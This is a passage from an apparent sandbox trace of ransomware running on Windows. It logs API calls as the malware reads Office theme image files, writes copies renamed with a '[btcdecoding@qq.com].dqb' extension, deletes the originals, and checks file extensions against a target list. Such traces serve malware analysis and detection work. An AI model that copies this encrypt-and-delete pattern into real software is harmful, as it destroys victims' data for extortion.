lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.623] WriteFile (in: hFile=0x224, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.626] SetEndOfFile (hFile=0x224) returned 1 [0045.627] CloseHandle (hObject=0x224) returned 1 [0045.633] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.635] SetEndOfFile (hFile=0x228) returned 1 [0045.640] CloseHandle (hObject=0x228) returned 1 [0045.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.640] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 1 [0045.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.640] lstrlenW (lpString=".doc") returned 4 [0045.640] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.640] lstrlenW (lpString=".docx") returned 5 [0045.640] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.640] lstrlenW (lpString=".pdf") returned 4 [0045.640] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.640] lstrlenW (lpString=".xls") returned 4 [0045.640] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.640] lstrlenW (lpString=".xlsx") returned 5 [0045.640] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.640] lstrlenW (lpString=".ppt") returned 4 [0045.640] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.640] lstrlenW (lpString=".zip") returned 4 [0045.641] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.641] lstrlenW (lpString=".rar") returned 4 [0045.641] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.641] lstrlenW (lpString=".bz2") returned 4 [0045.641] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.641] lstrlenW (lpString=".7z") returned 3 [0045.641] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.641] lstrlenW (lpString=".dbf") returned 4 [0045.641] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.641] lstrlenW (lpString=".1cd") returned 4 [0045.641] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.641] lstrlenW (lpString=".jpg") returned 4 [0045.641] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.641] lstrlenW (lpString=".doc") returned 4 [0045.641] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.641] lstrlenW (lpString=".docx") returned 5 [0045.641] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.641] lstrlenW (lpString=".pdf") returned 4 [0045.641] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.641] lstrlenW (lpString=".xls") returned 4 [0045.641] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.641] lstrlenW (lpString=".xlsx") returned 5 [0045.641] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.641] lstrlenW (lpString=".ppt") returned 4 [0045.641] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.641] lstrlenW (lpString=".zip") returned 4 [0045.641] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.641] lstrlenW (lpString=".rar") returned 4 [0045.642] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.642] lstrlenW (lpString=".bz2") returned 4 [0045.642] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.642] lstrlenW (lpString=".7z") returned 3 [0045.642] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.642] lstrlenW (lpString=".dbf") returned 4 [0045.642] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.642] lstrlenW (lpString=".1cd") returned 4 [0045.642] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0045.642] lstrlenW (lpString=".jpg") returned 4 [0045.642] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.642] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0045.642] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.642] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0045.642] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=2527) returned 1 [0045.642] CloseHandle (hObject=0x228) returned 1 [0045.642] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 0x20 [0045.642] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0045.643] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.643] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0045.675] GetLastError () returned 0x0 [0045.675] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x9df, lpOverlapped=0x0) returned 1 [0045.678] WriteFile (in: hFile=0x164, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x9e0, lpOverlapped=0x0) returned 1 [0045.679] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.679] WriteFile (in: hFile=0x164, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.679] SetEndOfFile (hFile=0x164) returned 1 [0045.680] CloseHandle (hObject=0x164) returned 1 [0045.680] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.680] SetEndOfFile (hFile=0x228) returned 1 [0045.680] CloseHandle (hObject=0x228) returned 1 [0045.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.681] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 1 [0045.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.681] lstrlenW (lpString=".doc") returned 4 [0045.681] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.681] lstrlenW (lpString=".docx") returned 5 [0045.681] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.681] lstrlenW (lpString=".pdf") returned 4 [0045.681] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.681] lstrlenW (lpString=".xls") returned 4 [0045.681] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.681] lstrlenW (lpString=".xlsx") returned 5 [0045.681] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.681] lstrlenW (lpString=".ppt") returned 4 [0045.681] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.681] lstrlenW (lpString=".zip") returned 4 [0045.681] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.681] lstrlenW (lpString=".rar") returned 4 [0045.681] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.681] lstrlenW (lpString=".bz2") returned 4 [0045.681] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.681] lstrlenW (lpString=".7z") returned 3 [0045.682] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.682] lstrlenW (lpString=".dbf") returned 4 [0045.682] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.682] lstrlenW (lpString=".1cd") returned 4 [0045.682] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.682] lstrlenW (lpString=".jpg") returned 4 [0045.682] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.682] lstrlenW (lpString=".doc") returned 4 [0045.682] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.682] lstrlenW (lpString=".docx") returned 5 [0045.682] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.682] lstrlenW (lpString=".pdf") returned 4 [0045.682] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.682] lstrlenW (lpString=".xls") returned 4 [0045.682] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.682] lstrlenW (lpString=".xlsx") returned 5 [0045.682] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.682] lstrlenW (lpString=".ppt") returned 4 [0045.682] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.682] lstrlenW (lpString=".zip") returned 4 [0045.682] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.682] lstrlenW (lpString=".rar") returned 4 [0045.682] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.682] lstrlenW (lpString=".bz2") returned 4 [0045.682] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.682] lstrlenW (lpString=".7z") returned 3 [0045.682] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.682] lstrlenW (lpString=".dbf") returned 4 [0045.682] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.683] lstrlenW (lpString=".1cd") returned 4 [0045.683] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0045.683] lstrlenW (lpString=".jpg") returned 4 [0045.683] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.683] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0045.683] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0045.684] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=19525) returned 1 [0045.684] CloseHandle (hObject=0x228) returned 1 [0045.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 0x20 [0045.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0045.685] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.685] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0045.685] GetLastError () returned 0x0 [0045.685] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x4c45, lpOverlapped=0x0) returned 1 [0045.687] WriteFile (in: hFile=0x164, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x4c50, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x4c50, lpOverlapped=0x0) returned 1 [0045.690] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.690] WriteFile (in: hFile=0x164, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.691] SetEndOfFile (hFile=0x164) returned 1 [0045.691] CloseHandle (hObject=0x164) returned 1 [0045.691] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.691] SetEndOfFile (hFile=0x228) returned 1 [0045.692] CloseHandle (hObject=0x228) returned 1 [0045.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.692] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 1 [0045.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.692] lstrlenW (lpString=".doc") returned 4 [0045.692] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.692] lstrlenW (lpString=".docx") returned 5 [0045.692] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.692] lstrlenW (lpString=".pdf") returned 4 [0045.692] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.692] lstrlenW (lpString=".xls") returned 4 [0045.692] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.692] lstrlenW (lpString=".xlsx") returned 5 [0045.692] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.692] lstrlenW (lpString=".ppt") returned 4 [0045.692] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.693] lstrlenW (lpString=".zip") returned 4 [0045.693] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.693] lstrlenW (lpString=".rar") returned 4 [0045.693] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.693] lstrlenW (lpString=".bz2") returned 4 [0045.693] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.693] lstrlenW (lpString=".7z") returned 3 [0045.693] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.693] lstrlenW (lpString=".dbf") returned 4 [0045.693] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.693] lstrlenW (lpString=".1cd") returned 4 [0045.693] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.693] lstrlenW (lpString=".jpg") returned 4 [0045.693] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.693] lstrlenW (lpString=".doc") returned 4 [0045.693] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.693] lstrlenW (lpString=".docx") returned 5 [0045.693] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.693] lstrlenW (lpString=".pdf") returned 4 [0045.693] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.693] lstrlenW (lpString=".xls") returned 4 [0045.693] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.693] lstrlenW (lpString=".xlsx") returned 5 [0045.693] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.693] lstrlenW (lpString=".ppt") returned 4 [0045.693] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.693] lstrlenW (lpString=".zip") returned 4 [0045.694] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.694] lstrlenW (lpString=".rar") returned 4 [0045.694] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.694] lstrlenW (lpString=".bz2") returned 4 [0045.694] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.694] lstrlenW (lpString=".7z") returned 3 [0045.694] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.694] lstrlenW (lpString=".dbf") returned 4 [0045.694] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.694] lstrlenW (lpString=".1cd") returned 4 [0045.694] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0045.694] lstrlenW (lpString=".jpg") returned 4 [0045.694] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.694] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0045.694] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0045.694] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1737) returned 1 [0045.694] CloseHandle (hObject=0x228) returned 1 [0045.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 0x20 [0045.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0045.695] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.695] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0046.217] GetLastError () returned 0x0 [0046.217] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x6c9, lpOverlapped=0x0) returned 1 [0046.221] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x6d0, lpOverlapped=0x0) returned 1 [0046.222] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.222] WriteFile (in: 